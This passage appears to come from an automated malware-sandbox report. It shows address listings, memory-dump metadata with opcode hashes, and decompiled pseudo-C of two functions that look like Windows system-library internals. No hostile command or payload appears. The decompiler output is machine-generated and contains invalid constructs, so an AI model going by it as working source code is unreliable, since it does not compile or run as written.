                                                          0x00000000
                                                          0x034a6e52
                                                          0x034a6e53
                                                          0x034a6e56
                                                          0x034a6e5d
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x034a6e5f
                                                          0x034a6e67
                                                          0x034a6e77
                                                          0x034a6e7f
                                                          0x034a6e80
                                                          0x034a6e88
                                                          0x034a6e90
                                                          0x034a6e9f
                                                          0x034a6ea5
                                                          0x034a6ea9
                                                          0x034a6eb1
                                                          0x034a6ebf
                                                          0x00000000
                                                          0x00000000
                                                          0x034a6ecf
                                                          0x034a6ed3
                                                          0x00000000
                                                          0x00000000
                                                          0x034a6edb
                                                          0x034a6ede
                                                          0x034a6ee1
                                                          0x034a6ee8
                                                          0x034a6eeb
                                                          0x034a6eed
                                                          0x034a6ef0
                                                          0x034a6ef4
                                                          0x034a6ef8
                                                          0x034a6efc
                                                          0x00000000
                                                          0x00000000
                                                          0x034a6f0d
                                                          0x034a6f11
                                                          0x034a6f32
                                                          0x034a6f37
                                                          0x034a6f3b
                                                          0x034a6f3e
                                                          0x034a6f41
                                                          0x034a6f46
                                                          0x00000000
                                                          0x00000000
                                                          0x034a6f4c
                                                          0x034a6f50
                                                          0x034a6f50
                                                          0x034a6f54
                                                          0x034a6f62
                                                          0x034a6f65
                                                          0x034a6f6d
                                                          0x034a6f7b
                                                          0x034a6f7b
                                                          0x034a6f93
                                                          0x034a6f98
                                                          0x034a6fa0
                                                          0x034a6fa6
                                                          0x034a6fb3
                                                          0x034a6fb6
                                                          0x034a6fbf
                                                          0x034a6fc1
                                                          0x034a6fd5
                                                          0x034a6fda
                                                          0x034a6fda
                                                          0x034a6fdd
                                                          0x034a6fe2
                                                          0x034a6fe7
                                                          0x034a6feb
                                                          0x034a6fef
                                                          0x034a6ff3
                                                          0x0346520c
                                                          0x0346520c
                                                          0x0346520f
                                                          0x03465215
                                                          0x03465234
                                                          0x0346523a
                                                          0x0346523a
                                                          0x03465244
                                                          0x03465245
                                                          0x03465246
                                                          0x03465251
                                                          0x03465251
                                                          0x034a6f13
                                                          0x034a6f17
                                                          0x034a6f17
                                                          0x034a6f18
                                                          0x034a6f1b
                                                          0x034a6f1f
                                                          0x034a6f23
                                                          0x00000000
                                                          0x034a6f28
                                                          0x03465204
                                                          0x03465204
                                                          0x03465208
                                                          0x00000000
                                                          0x03465208
                                                          0x03465185
                                                          0x03465188
                                                          0x0346518a
                                                          0x0346518e
                                                          0x03465195
                                                          0x034a6db1
                                                          0x034a6db5
                                                          0x034a6db9
                                                          0x0346519b
                                                          0x0346519b
                                                          0x0346519e
                                                          0x034651a7
                                                          0x034651a9
                                                          0x034651a9
                                                          0x034651b5
                                                          0x034651b8
                                                          0x034651bb
                                                          0x034651be
                                                          0x034651c1
                                                          0x034651c5
                                                          0x034651c9
                                                          0x034651cd
                                                          0x034651cd
                                                          0x034651d8
                                                          0x034651dc
                                                          0x034651e0
                                                          0x034a6dcc
                                                          0x034a6dd0
                                                          0x034a6dd5
                                                          0x034a6ddd
                                                          0x034a6de1
                                                          0x034a6de1
                                                          0x034a6de5
                                                          0x034a6deb
                                                          0x034a6df1
                                                          0x034a6df7
                                                          0x034a6dfd
                                                          0x034a6e01
                                                          0x034a6e05
                                                          0x034a6e09
                                                          0x034a6e0d
                                                          0x034a6e11
                                                          0x034a6e11
                                                          0x034651eb
                                                          0x034a6e1a
                                                          0x034a6e1f
                                                          0x034a6e21
                                                          0x034a6e23
                                                          0x00000000
                                                          0x034651f1
                                                          0x034651f1
                                                          0x00000000
                                                          0x034651f1

                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.903134301.0000000003410000.00000040.00000001.sdmp, Offset: 03410000, based on PE: true
                                                          • Associated: 0000000A.00000002.903329978.000000000352B000.00000040.00000001.sdmp Download File
                                                          • Associated: 0000000A.00000002.903338998.000000000352F000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: cd39f9403200304cf770835b1047a6f7aef7cd6a15d813202971cf8d4c86df0b
                                                          • Instruction ID: 228f4d2ec1cc78af1611bf3ddfa8d6ac43a8d882a2554fd7aa206c4c40207231
                                                          • Opcode Fuzzy Hash: cd39f9403200304cf770835b1047a6f7aef7cd6a15d813202971cf8d4c86df0b
                                                          • Instruction Fuzzy Hash: 3CC120755087808FD354CF28C580A6AFBF1BF89304F188AAEF8998B352D775E945CB46
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 034603E2, Relevance: .3, Instructions: 254COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 74%
                                                          			E034603E2(signed int __ecx, signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				char _v52;
				char _v56;
				char _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t56;
				signed int _t58;
				char* _t64;
				intOrPtr _t65;
				signed int _t74;
				signed int _t79;
				char* _t83;
				intOrPtr _t84;
				signed int _t93;
				signed int _t94;
				signed char* _t95;
				signed int _t99;
				signed int _t100;
				signed char* _t101;
				signed int _t105;
				signed int _t119;
				signed int _t120;
				void* _t122;
				signed int _t123;
				signed int _t127;

				_v8 =  *0x352d360 ^ _t127;
				_t119 = __ecx;
				_t105 = __edx;
				_t118 = 0;
				_v20 = __edx;
				_t120 =  *(__ecx + 0x20);
				if(E03460548(__ecx, 0) != 0) {
					_t56 = 0xc000022d;
					L23:
					return E0347B640(_t56, _t105, _v8 ^ _t127, _t118, _t119, _t120);
				} else {
					_v12 = _v12 | 0xffffffff;
					_t58 = _t120 + 0x24;
					_t109 =  *(_t120 + 0x18);
					_t118 = _t58;
					_v16 = _t58;
					E0344B02A( *(_t120 + 0x18), _t118, 0x14a5);
					_v52 = 0x18;
					_v48 = 0;
					0x840 = 0x40;
					if( *0x3527c1c != 0) {
					}
					_v40 = 0x840;
					_v44 = _t105;
					_v36 = 0;
					_v32 = 0;
					if(E03457D50() != 0) {
						_t64 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t64 = 0x7ffe0384;
					}
					if( *_t64 != 0) {
						_t65 =  *[fs:0x30];
						__eflags =  *(_t65 + 0x240) & 0x00000004;
						if(( *(_t65 + 0x240) & 0x00000004) != 0) {
							_t100 = E03457D50();
							__eflags = _t100;
							if(_t100 == 0) {
								_t101 = 0x7ffe0385;
							} else {
								_t101 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t101 & 0x00000020;
							if(( *_t101 & 0x00000020) != 0) {
								_t118 = _t118 | 0xffffffff;
								_t109 = 0x1485;
								E034B7016(0x1485, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					_t105 = 0;
					while(1) {
						_push(0x60);
						_push(5);
						_push( &_v64);
						_push( &_v52);
						_push(0x100021);
						_push( &_v12);
						_t122 = E03479830();
						if(_t122 >= 0) {
							break;
						}
						__eflags = _t122 - 0xc0000034;
						if(_t122 == 0xc0000034) {
							L38:
							_t120 = 0xc0000135;
							break;
						}
						__eflags = _t122 - 0xc000003a;
						if(_t122 == 0xc000003a) {
							goto L38;
						}
						__eflags = _t122 - 0xc0000022;
						if(_t122 != 0xc0000022) {
							break;
						}
						__eflags = _t105;
						if(__eflags != 0) {
							break;
						}
						_t109 = _t119;
						_t99 = E034B69A6(_t119, __eflags);
						__eflags = _t99;
						if(_t99 == 0) {
							break;
						}
						_t105 = _t105 + 1;
					}
					if( !_t120 >= 0) {
						L22:
						_t56 = _t120;
						goto L23;
					}
					if( *0x3527c04 != 0) {
						_t118 = _v12;
						_t120 = E034BA7AC(_t119, _t118, _t109);
						__eflags = _t120;
						if(_t120 >= 0) {
							goto L10;
						}
						__eflags =  *0x3527bd8;
						if( *0x3527bd8 != 0) {
							L20:
							if(_v12 != 0xffffffff) {
								_push(_v12);
								E034795D0();
							}
							goto L22;
						}
					}
					L10:
					_push(_v12);
					_t105 = _t119 + 0xc;
					_push(0x1000000);
					_push(0x10);
					_push(0);
					_push(0);
					_push(0xf);
					_push(_t105);
					_t120 = E034799A0();
					if(_t120 < 0) {
						__eflags = _t120 - 0xc000047e;
						if(_t120 == 0xc000047e) {
							L51:
							_t74 = E034B3540(_t120);
							_t119 = _v16;
							_t120 = _t74;
							L52:
							_t118 = 0x1485;
							E0343B1E1(_t120, 0x1485, 0, _t119);
							goto L20;
						}
						__eflags = _t120 - 0xc000047f;
						if(_t120 == 0xc000047f) {
							goto L51;
						}
						__eflags = _t120 - 0xc0000462;
						if(_t120 == 0xc0000462) {
							goto L51;
						}
						_t119 = _v16;
						__eflags = _t120 - 0xc0000017;
						if(_t120 != 0xc0000017) {
							__eflags = _t120 - 0xc000009a;
							if(_t120 != 0xc000009a) {
								__eflags = _t120 - 0xc000012d;
								if(_t120 != 0xc000012d) {
									_v28 = _t119;
									_push( &_v56);
									_push(1);
									_v24 = _t120;
									_push( &_v28);
									_push(1);
									_push(2);
									_push(0xc000007b);
									_t79 = E0347AAF0();
									__eflags = _t79;
									if(_t79 >= 0) {
										__eflags =  *0x3528474 - 3;
										if( *0x3528474 != 3) {
											 *0x35279dc =  *0x35279dc + 1;
										}
									}
								}
							}
						}
						goto L52;
					}
					if(E03457D50() != 0) {
						_t83 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t83 = 0x7ffe0384;
					}
					if( *_t83 != 0) {
						_t84 =  *[fs:0x30];
						__eflags =  *(_t84 + 0x240) & 0x00000004;
						if(( *(_t84 + 0x240) & 0x00000004) != 0) {
							_t94 = E03457D50();
							__eflags = _t94;
							if(_t94 == 0) {
								_t95 = 0x7ffe0385;
							} else {
								_t95 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t95 & 0x00000020;
							if(( *_t95 & 0x00000020) != 0) {
								E034B7016(0x1486, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					if(( *(_t119 + 0x10) & 0x00000100) == 0) {
						if( *0x3528708 != 0) {
							_t118 =  *0x7ffe0330;
							_t123 =  *0x3527b00; // 0x0
							asm("ror esi, cl");
							 *0x352b1e0(_v12, _v20, 0x20);
							_t93 =  *(_t123 ^  *0x7ffe0330)();
							_t50 = _t93 + 0x3ffffddb; // 0x3ffffddb
							asm("sbb esi, esi");
							_t120 =  ~_t50 & _t93;
						} else {
							_t120 = 0;
						}
					}
					if( !_t120 >= 0) {
						L19:
						_push( *_t105);
						E034795D0();
						 *_t105 =  *_t105 & 0x00000000;
						goto L20;
					}
					_t120 = E03447F65(_t119);
					if( *((intOrPtr*)(_t119 + 0x60)) != 0) {
						__eflags = _t120;
						if(_t120 < 0) {
							goto L19;
						}
						 *(_t119 + 0x64) = _v12;
						goto L22;
					}
					goto L19;
				}
			}








































                                                          0x034603f1
                                                          0x034603f7
                                                          0x034603f9
                                                          0x034603fb
                                                          0x034603fd
                                                          0x03460400
                                                          0x0346040a
                                                          0x034a4c7a
                                                          0x03460537
                                                          0x03460547
                                                          0x03460410
                                                          0x03460410
                                                          0x03460414
                                                          0x03460417
                                                          0x0346041a
                                                          0x03460421
                                                          0x03460424
                                                          0x0346042b
                                                          0x0346043b
                                                          0x0346043e
                                                          0x0346043f
                                                          0x0346043f
                                                          0x03460446
                                                          0x03460449
                                                          0x0346044c
                                                          0x0346044f
                                                          0x03460459
                                                          0x034a4c8d
                                                          0x0346045f
                                                          0x0346045f
                                                          0x0346045f
                                                          0x03460467
                                                          0x034a4c97
                                                          0x034a4c9d
                                                          0x034a4ca4
                                                          0x034a4caa
                                                          0x034a4caf
                                                          0x034a4cb1
                                                          0x034a4cc3
                                                          0x034a4cb3
                                                          0x034a4cbc
                                                          0x034a4cbc
                                                          0x034a4cc8
                                                          0x034a4ccb
                                                          0x034a4cd7
                                                          0x034a4cda
                                                          0x034a4cdf
                                                          0x034a4cdf
                                                          0x034a4ccb
                                                          0x034a4ca4
                                                          0x0346046d
                                                          0x0346046f
                                                          0x0346046f
                                                          0x03460471
                                                          0x03460476
                                                          0x0346047a
                                                          0x0346047b
                                                          0x03460483
                                                          0x03460489
                                                          0x0346048d
                                                          0x00000000
                                                          0x00000000
                                                          0x034a4ce9
                                                          0x034a4cef
                                                          0x034a4d22
                                                          0x034a4d22
                                                          0x00000000
                                                          0x034a4d22
                                                          0x034a4cf1
                                                          0x034a4cf7
                                                          0x00000000
                                                          0x00000000
                                                          0x034a4cf9
                                                          0x034a4cff
                                                          0x00000000
                                                          0x00000000
                                                          0x034a4d05
                                                          0x034a4d07
                                                          0x00000000
                                                          0x00000000
                                                          0x034a4d0d
                                                          0x034a4d0f
                                                          0x034a4d14
                                                          0x034a4d16
                                                          0x00000000
                                                          0x00000000
                                                          0x034a4d1c
                                                          0x034a4d1c
                                                          0x03460499
                                                          0x03460535
                                                          0x03460535
                                                          0x00000000
                                                          0x03460535
                                                          0x034604a6
                                                          0x034a4d2c
                                                          0x034a4d37
                                                          0x034a4d39
                                                          0x034a4d3b
                                                          0x00000000
                                                          0x00000000
                                                          0x034a4d41
                                                          0x034a4d48
                                                          0x03460527
                                                          0x0346052b
                                                          0x0346052d
                                                          0x03460530
                                                          0x03460530
                                                          0x00000000
                                                          0x0346052b
                                                          0x034a4d4e
                                                          0x034604ac
                                                          0x034604ac
                                                          0x034604af
                                                          0x034604b2
                                                          0x034604b7
                                                          0x034604b9
                                                          0x034604bb
                                                          0x034604bd
                                                          0x034604bf
                                                          0x034604c5
                                                          0x034604c9
                                                          0x034a4d53
                                                          0x034a4d59
                                                          0x034a4db9
                                                          0x034a4dba
                                                          0x034a4dbf
                                                          0x034a4dc2
                                                          0x034a4dc4
                                                          0x034a4dc7
                                                          0x034a4dce
                                                          0x00000000
                                                          0x034a4dce
                                                          0x034a4d5b
                                                          0x034a4d61
                                                          0x00000000
                                                          0x00000000
                                                          0x034a4d63
                                                          0x034a4d69
                                                          0x00000000
                                                          0x00000000
                                                          0x034a4d6b
                                                          0x034a4d6e
                                                          0x034a4d74
                                                          0x034a4d76
                                                          0x034a4d7c
                                                          0x034a4d7e
                                                          0x034a4d84
                                                          0x034a4d89
                                                          0x034a4d8c
                                                          0x034a4d8d
                                                          0x034a4d92
                                                          0x034a4d95
                                                          0x034a4d96
                                                          0x034a4d98
                                                          0x034a4d9a
                                                          0x034a4d9f
                                                          0x034a4da4
                                                          0x034a4da6
                                                          0x034a4da8
                                                          0x034a4daf
                                                          0x034a4db1
                                                          0x034a4db1
                                                          0x034a4daf
                                                          0x034a4da6
                                                          0x034a4d84
                                                          0x034a4d7c
                                                          0x00000000
                                                          0x034a4d74
                                                          0x034604d6
                                                          0x034a4de1
                                                          0x034604dc
                                                          0x034604dc
                                                          0x034604dc
                                                          0x034604e4
                                                          0x034a4deb
                                                          0x034a4df1
                                                          0x034a4df8
                                                          0x034a4dfe
                                                          0x034a4e03
                                                          0x034a4e05
                                                          0x034a4e17
                                                          0x034a4e07
                                                          0x034a4e10
                                                          0x034a4e10
                                                          0x034a4e1c
                                                          0x034a4e1f
                                                          0x034a4e35
                                                          0x034a4e35
                                                          0x034a4e1f
                                                          0x034a4df8
                                                          0x034604f1
                                                          0x034604fa
                                                          0x034a4e3f
                                                          0x034a4e47
                                                          0x034a4e5b
                                                          0x034a4e61
                                                          0x034a4e67
                                                          0x034a4e69
                                                          0x034a4e71
                                                          0x034a4e73
                                                          0x03460500
                                                          0x03460500
                                                          0x03460500
                                                          0x034604fa
                                                          0x03460508
                                                          0x0346051d
                                                          0x0346051d
                                                          0x0346051f
                                                          0x03460524
                                                          0x00000000
                                                          0x03460524
                                                          0x03460515
                                                          0x03460517
                                                          0x034a4e7a
                                                          0x034a4e7c
                                                          0x00000000
                                                          0x00000000
                                                          0x034a4e85
                                                          0x00000000
                                                          0x034a4e85
                                                          0x00000000
                                                          0x03460517

                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.903134301.0000000003410000.00000040.00000001.sdmp, Offset: 03410000, based on PE: true
                                                          • Associated: 0000000A.00000002.903329978.000000000352B000.00000040.00000001.sdmp Download File
                                                          • Associated: 0000000A.00000002.903338998.000000000352F000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4395f6ca18473c322157d4b955e96775431bea2cee9529848f4e10cffe656370
                                                          • Instruction ID: 162d655e7ff24df76d0e258b51d404e9e76dceb6169c5d786148d4ba8466af8b
                                                          • Opcode Fuzzy Hash: 4395f6ca18473c322157d4b955e96775431bea2cee9529848f4e10cffe656370
                                                          • Instruction Fuzzy Hash: 0C912831E047149FDB31DE6DC844BAEBBA4AB15714F1A0267E911AF3D0D7B49D01C78A
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0343C600, Relevance: .2, Instructions: 225COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 67%
                                                          			E0343C600(intOrPtr _a4, intOrPtr _a8, signed int _a12, signed char _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				char _v1036;
				signed int _v1040;
				char _v1048;
				signed int _v1052;
				signed char _v1056;
				void* _v1058;
				char _v1060;
				signed int _v1064;
				void* _v1068;
				intOrPtr _v1072;
				void* _v1084;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t70;
				intOrPtr _t72;
				signed int _t74;
				intOrPtr _t77;
				signed int _t78;
				signed int _t81;
				void* _t101;
				signed int _t102;
				signed int _t107;
				signed int _t109;
				signed int _t110;
				signed char _t111;
				signed int _t112;
				signed int _t113;
				signed int _t114;
				intOrPtr _t116;
				void* _t117;
				char _t118;
				void* _t120;
				char _t121;
				signed int _t122;
				signed int _t123;
				signed int _t125;

				_t125 = (_t123 & 0xfffffff8) - 0x424;
				_v8 =  *0x352d360 ^ _t125;
				_t116 = _a4;
				_v1056 = _a16;
				_v1040 = _a24;
				if(E03446D30( &_v1048, _a8) < 0) {
					L4:
					_pop(_t117);
					_pop(_t120);
					_pop(_t101);
					return E0347B640(_t68, _t101, _v8 ^ _t125, _t114, _t117, _t120);
				}
				_t70 = _a20;
				if(_t70 >= 0x3f4) {
					_t121 = _t70 + 0xc;
					L19:
					_t107 =  *( *[fs:0x30] + 0x18);
					__eflags = _t107;
					if(_t107 == 0) {
						L60:
						_t68 = 0xc0000017;
						goto L4;
					}
					_t72 =  *0x3527b9c; // 0x0
					_t74 = L03454620(_t107, _t107, _t72 + 0x180000, _t121);
					_v1064 = _t74;
					__eflags = _t74;
					if(_t74 == 0) {
						goto L60;
					}
					_t102 = _t74;
					_push( &_v1060);
					_push(_t121);
					_push(_t74);
					_push(2);
					_push( &_v1048);
					_push(_t116);
					_t122 = E03479650();
					__eflags = _t122;
					if(_t122 >= 0) {
						L7:
						_t114 = _a12;
						__eflags = _t114;
						if(_t114 != 0) {
							_t77 = _a20;
							L26:
							_t109 =  *(_t102 + 4);
							__eflags = _t109 - 3;
							if(_t109 == 3) {
								L55:
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									L59:
									_t122 = 0xc0000024;
									L15:
									_t78 = _v1052;
									__eflags = _t78;
									if(_t78 != 0) {
										L034577F0( *( *[fs:0x30] + 0x18), 0, _t78);
									}
									_t68 = _t122;
									goto L4;
								}
								_t110 = _v1056;
								_t118 =  *((intOrPtr*)(_t102 + 8));
								_v1060 = _t118;
								__eflags = _t110;
								if(_t110 == 0) {
									L10:
									_t122 = 0x80000005;
									L11:
									_t81 = _v1040;
									__eflags = _t81;
									if(_t81 == 0) {
										goto L15;
									}
									__eflags = _t122;
									if(_t122 >= 0) {
										L14:
										 *_t81 = _t118;
										goto L15;
									}
									__eflags = _t122 - 0x80000005;
									if(_t122 != 0x80000005) {
										goto L15;
									}
									goto L14;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t77;
								if( *((intOrPtr*)(_t102 + 8)) > _t77) {
									goto L10;
								}
								_push( *((intOrPtr*)(_t102 + 8)));
								_t59 = _t102 + 0xc; // 0xc
								_push(_t110);
								L54:
								E0347F3E0();
								_t125 = _t125 + 0xc;
								goto L11;
							}
							__eflags = _t109 - 7;
							if(_t109 == 7) {
								goto L55;
							}
							_t118 = 4;
							__eflags = _t109 - _t118;
							if(_t109 != _t118) {
								__eflags = _t109 - 0xb;
								if(_t109 != 0xb) {
									__eflags = _t109 - 1;
									if(_t109 == 1) {
										__eflags = _t114 - _t118;
										if(_t114 != _t118) {
											_t118 =  *((intOrPtr*)(_t102 + 8));
											_v1060 = _t118;
											__eflags = _t118 - _t77;
											if(_t118 > _t77) {
												goto L10;
											}
											_push(_t118);
											_t56 = _t102 + 0xc; // 0xc
											_push(_v1056);
											goto L54;
										}
										__eflags = _t77 - _t118;
										if(_t77 != _t118) {
											L34:
											_t122 = 0xc0000004;
											goto L15;
										}
										_t111 = _v1056;
										__eflags = _t111 & 0x00000003;
										if((_t111 & 0x00000003) == 0) {
											_v1060 = _t118;
											__eflags = _t111;
											if(__eflags == 0) {
												goto L10;
											}
											_t42 = _t102 + 0xc; // 0xc
											 *((intOrPtr*)(_t125 + 0x20)) = _t42;
											_v1048 =  *((intOrPtr*)(_t102 + 8));
											_push(_t111);
											 *((short*)(_t125 + 0x22)) =  *((intOrPtr*)(_t102 + 8));
											_push(0);
											_push( &_v1048);
											_t122 = E034713C0(_t102, _t118, _t122, __eflags);
											L44:
											_t118 = _v1072;
											goto L11;
										}
										_t122 = 0x80000002;
										goto L15;
									}
									_t122 = 0xc0000024;
									goto L44;
								}
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									goto L59;
								}
								_t118 = 8;
								__eflags = _t77 - _t118;
								if(_t77 != _t118) {
									goto L34;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
								if( *((intOrPtr*)(_t102 + 8)) != _t118) {
									goto L34;
								}
								_t112 = _v1056;
								_v1060 = _t118;
								__eflags = _t112;
								if(_t112 == 0) {
									goto L10;
								}
								 *_t112 =  *((intOrPtr*)(_t102 + 0xc));
								 *((intOrPtr*)(_t112 + 4)) =  *((intOrPtr*)(_t102 + 0x10));
								goto L11;
							}
							__eflags = _t114 - _t118;
							if(_t114 != _t118) {
								goto L59;
							}
							__eflags = _t77 - _t118;
							if(_t77 != _t118) {
								goto L34;
							}
							__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
							if( *((intOrPtr*)(_t102 + 8)) != _t118) {
								goto L34;
							}
							_t113 = _v1056;
							_v1060 = _t118;
							__eflags = _t113;
							if(_t113 == 0) {
								goto L10;
							}
							 *_t113 =  *((intOrPtr*)(_t102 + 0xc));
							goto L11;
						}
						_t118 =  *((intOrPtr*)(_t102 + 8));
						__eflags = _t118 - _a20;
						if(_t118 <= _a20) {
							_t114 =  *(_t102 + 4);
							_t77 = _t118;
							goto L26;
						}
						_v1060 = _t118;
						goto L10;
					}
					__eflags = _t122 - 0x80000005;
					if(_t122 != 0x80000005) {
						goto L15;
					}
					L034577F0( *( *[fs:0x30] + 0x18), 0, _t102);
					L18:
					_t121 = _v1060;
					goto L19;
				}
				_push( &_v1060);
				_push(0x400);
				_t102 =  &_v1036;
				_push(_t102);
				_push(2);
				_push( &_v1048);
				_push(_t116);
				_t122 = E03479650();
				if(_t122 >= 0) {
					__eflags = 0;
					_v1052 = 0;
					goto L7;
				}
				if(_t122 == 0x80000005) {
					goto L18;
				}
				goto L4;
			}










































                                                          0x0343c608
                                                          0x0343c615
                                                          0x0343c625
                                                          0x0343c62d
                                                          0x0343c635
                                                          0x0343c640
                                                          0x0343c680
                                                          0x0343c687
                                                          0x0343c688
                                                          0x0343c689
                                                          0x0343c694
                                                          0x0343c694
                                                          0x0343c642
                                                          0x0343c64a
                                                          0x0343c697
                                                          0x034a7a25
                                                          0x034a7a2b
                                                          0x034a7a2e
                                                          0x034a7a30
                                                          0x034a7bea
                                                          0x034a7bea
                                                          0x00000000
                                                          0x034a7bea
                                                          0x034a7a36
                                                          0x034a7a43
                                                          0x034a7a48
                                                          0x034a7a4c
                                                          0x034a7a4e
                                                          0x00000000
                                                          0x00000000
                                                          0x034a7a58
                                                          0x034a7a5a
                                                          0x034a7a5b
                                                          0x034a7a5c
                                                          0x034a7a5d
                                                          0x034a7a63
                                                          0x034a7a64
                                                          0x034a7a6a
                                                          0x034a7a6c
                                                          0x034a7a6e
                                                          0x034a79cb
                                                          0x034a79cb
                                                          0x034a79ce
                                                          0x034a79d0
                                                          0x034a7a98
                                                          0x034a7a9b
                                                          0x034a7a9b
                                                          0x034a7a9e
                                                          0x034a7aa1
                                                          0x034a7bbe
                                                          0x034a7bbe
                                                          0x034a7bc0
                                                          0x034a7be0
                                                          0x034a7be0
                                                          0x034a7a01
                                                          0x034a7a01
                                                          0x034a7a05
                                                          0x034a7a07
                                                          0x034a7a15
                                                          0x034a7a15
                                                          0x034a7a1a
                                                          0x00000000
                                                          0x034a7a1a
                                                          0x034a7bc2
                                                          0x034a7bc6
                                                          0x034a7bc9
                                                          0x034a7bcd
                                                          0x034a7bcf
                                                          0x034a79e6
                                                          0x034a79e6
                                                          0x034a79eb
                                                          0x034a79eb
                                                          0x034a79ef
                                                          0x034a79f1
                                                          0x00000000
                                                          0x00000000
                                                          0x034a79f3
                                                          0x034a79f5
                                                          0x034a79ff
                                                          0x034a79ff
                                                          0x00000000
                                                          0x034a79ff
                                                          0x034a79f7
                                                          0x034a79fd
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x034a79fd
                                                          0x034a7bd5
                                                          0x034a7bd8
                                                          0x00000000
                                                          0x00000000
                                                          0x034a7ba9
                                                          0x034a7bac
                                                          0x034a7bb0
                                                          0x034a7bb1
                                                          0x034a7bb1
                                                          0x034a7bb6
                                                          0x00000000
                                                          0x034a7bb6
                                                          0x034a7aa7
                                                          0x034a7aaa
                                                          0x00000000
                                                          0x00000000
                                                          0x034a7ab2
                                                          0x034a7ab3
                                                          0x034a7ab5
                                                          0x034a7aec
                                                          0x034a7aef
                                                          0x034a7b25
                                                          0x034a7b28
                                                          0x034a7b62
                                                          0x034a7b64
                                                          0x034a7b8f
                                                          0x034a7b92
                                                          0x034a7b96
                                                          0x034a7b98
                                                          0x00000000
                                                          0x00000000
                                                          0x034a7b9e
                                                          0x034a7b9f
                                                          0x034a7ba3
                                                          0x00000000
                                                          0x034a7ba3
                                                          0x034a7b66
                                                          0x034a7b68
                                                          0x034a7ae2
                                                          0x034a7ae2
                                                          0x00000000
                                                          0x034a7ae2
                                                          0x034a7b6e
                                                          0x034a7b72
                                                          0x034a7b75
                                                          0x034a7b81
                                                          0x034a7b85
                                                          0x034a7b87
                                                          0x00000000
                                                          0x00000000
                                                          0x034a7b31
                                                          0x034a7b34
                                                          0x034a7b3c
                                                          0x034a7b45
                                                          0x034a7b46
                                                          0x034a7b4f
                                                          0x034a7b51
                                                          0x034a7b57
                                                          0x034a7b59
                                                          0x034a7b59
                                                          0x00000000
                                                          0x034a7b59
                                                          0x034a7b77
                                                          0x00000000
                                                          0x034a7b77
                                                          0x034a7b2a
                                                          0x00000000
                                                          0x034a7b2a
                                                          0x034a7af1
                                                          0x034a7af3
                                                          0x00000000
                                                          0x00000000
                                                          0x034a7afb
                                                          0x034a7afc
                                                          0x034a7afe
                                                          0x00000000
                                                          0x00000000
                                                          0x034a7b00
                                                          0x034a7b03
                                                          0x00000000
                                                          0x00000000
                                                          0x034a7b05
                                                          0x034a7b09
                                                          0x034a7b0d
                                                          0x034a7b0f
                                                          0x00000000
                                                          0x00000000
                                                          0x034a7b18
                                                          0x034a7b1d
                                                          0x00000000
                                                          0x034a7b1d
                                                          0x034a7ab7
                                                          0x034a7ab9
                                                          0x00000000
                                                          0x00000000
                                                          0x034a7abf
                                                          0x034a7ac1
                                                          0x00000000
                                                          0x00000000
                                                          0x034a7ac3
                                                          0x034a7ac6
                                                          0x00000000
                                                          0x00000000
                                                          0x034a7ac8
                                                          0x034a7acc
                                                          0x034a7ad0
                                                          0x034a7ad2
                                                          0x00000000
                                                          0x00000000
                                                          0x034a7adb
                                                          0x00000000
                                                          0x034a7adb
                                                          0x034a79d6
                                                          0x034a79d9
                                                          0x034a79dc
                                                          0x034a7a91
                                                          0x034a7a94
                                                          0x00000000
                                                          0x034a7a94
                                                          0x034a79e2
                                                          0x00000000
                                                          0x034a79e2
                                                          0x034a7a74
                                                          0x034a7a7a
                                                          0x00000000
                                                          0x00000000
                                                          0x034a7a8a
                                                          0x034a7a21
                                                          0x034a7a21
                                                          0x00000000
                                                          0x034a7a21
                                                          0x0343c650
                                                          0x0343c651
                                                          0x0343c656
                                                          0x0343c65c
                                                          0x0343c65d
                                                          0x0343c663
                                                          0x0343c664
                                                          0x0343c66a
                                                          0x0343c66e
                                                          0x034a79c5
                                                          0x034a79c7
                                                          0x00000000
                                                          0x034a79c7
                                                          0x0343c67a
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000

                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.903134301.0000000003410000.00000040.00000001.sdmp, Offset: 03410000, based on PE: true
                                                          • Associated: 0000000A.00000002.903329978.000000000352B000.00000040.00000001.sdmp Download File
                                                          • Associated: 0000000A.00000002.903338998.000000000352F000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 91c21576733cbcc70da2ac2bf46e0b77435d233862e8aab77f51a5fb7c41f000
                                                          • Instruction ID: 1621c3fd165882860d21485c836d251048cd390b6b7b30381d954c6a6fc8e5ba
